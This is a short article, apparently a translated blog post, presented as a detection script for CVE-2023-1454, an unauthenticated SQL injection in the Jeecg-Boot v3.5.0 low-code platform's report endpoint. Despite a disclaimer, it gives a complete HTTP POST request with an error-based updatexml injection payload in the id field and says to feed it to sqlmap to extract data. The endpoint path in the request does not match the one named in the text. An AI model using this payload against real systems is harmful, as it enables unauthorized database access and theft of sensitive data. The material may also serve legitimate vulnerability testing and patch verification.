
CVE-2023-1454漏洞检测脚本
CVE-2023-1454 Vulnerability Detection Script
This article is for reference only. Do not use the technical materials and tools in this article to intrude into any computer system without authorization. The direct or indirect consequences and losses caused by the information provided in this article shall be borne by the user.
Jeecg-Boot is a low-code development platform based on a code generator. It provides a series of code generators, template engines, permission management, data dictionaries, data import and export, and other features to help developers quickly build enterprise-level applications.
The Java low-code platform Jeecg-Boot (v3.5.0) for enterprise web applications uses jimureport-spring-boot-starter-1.5.6.jar. Jeecg-Boot has a defect in filtering special characters. Under the condition of front-end Vue3 v3.5.0, Jeecg has an unauthorized SQL injection vulnerability. The vulnerability point exists in that the SQL called when the /querySql path is invoked does not process the id parameter, thus allowing direct error-based injection. An unauthenticated remote attacker, by constructing specially crafted strings, can ultimately obtain sensitive information from the target database.
Affected version: Jeecg-Boot = v3.5.0
Save the packet as a txt file and use sqlmap to obtain data
POST /jmreport/qurestSql HTTP/1.1
Host: xxx.xxx.xxx
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}